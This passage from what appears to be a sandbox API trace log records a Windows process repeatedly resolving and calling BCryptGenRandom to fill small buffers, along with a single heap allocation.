pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0262.526] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.526] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0262.526] GetProcessHeap () returned 0x440000 [0262.526] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0xf7) returned 0x3a01c50 [0262.526] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.526] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0262.526] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.527] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a01c51, cbBuffer=0x26, dwFlags=0x2 | out: pbBuffer=0x3a01c51) returned 0x0 [0262.527] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.527] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.527] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.527] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.527] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.527] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0262.528] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.528] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.528] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.528] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.528] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.528] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.528] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.528] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.528] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.528] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.529] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.529] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.529] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.529] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.529] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.529] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0262.530] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.530] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.530] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.530] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.530] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.530] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.531] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.531] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.531] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.531] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.531] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.532] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.532] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.532] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.532] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.532] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.533] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.533] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.533] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.533] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.533] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.533] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.533] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.533] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0262.534] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.534] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.534] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.534] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.534] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.534] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.534] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.534] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.534] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.535] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.535] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.535] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0262.535] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.535] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a01c77, cbBuffer=0x1b, dwFlags=0x2 | out: pbBuffer=0x3a01c77) returned 0x0 [0262.536] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.536] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0262.536] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.536] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.536] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.536] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.537] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.537] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0262.537] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.537] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.537] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.537] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0262.537] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.537] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0262.538] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.538] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.538] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.538] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.538] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.538] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.539] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.539] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0262.539] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.539] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.540] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.540] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.540] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.540] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.540] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.540] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0262.540] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.540] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.541] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.541] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.541] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.541] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.541] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.541] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.541] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.541] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0262.542] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.542] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0262.542] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.542] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a01c92, cbBuffer=0x26, dwFlags=0x2 | out: pbBuffer=0x3a01c92) returned 0x0 [0262.542] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.542] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0262.543] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.543] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.543] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.543] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.544] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.544] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.544] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.544] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.544] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.544] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0262.545] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.545] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.545] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.545] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0262.546] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.664] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.664] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.664] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0262.664] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.664] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.665] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.665] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.665] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.665] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.665] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.665] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.666] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.666] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.666] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.666] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.666] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.666] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.666] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.666] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0262.667] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.667] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.667] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.667] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.667] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.667] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.668] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.668] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.668] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.668] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0262.668] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.669] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0262.669] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.669] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.669] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.669] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.670] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.670] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0262.670] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.670] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0262.670] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.670] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0262.671] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.671] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.671] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.671] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.672] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.672] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0262.672] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.672] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a01cb8, cbBuffer=0x1e, dwFlags=0x2 | out: pbBuffer=0x3a01cb8) returned 0x0 [0262.672] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.672] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.672] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.672] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.673] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.673] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.673] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.673] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.673] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.673] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.674] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.674] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.674] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.674] BCryptGenRandom (in: hAlgorithm=0x0, 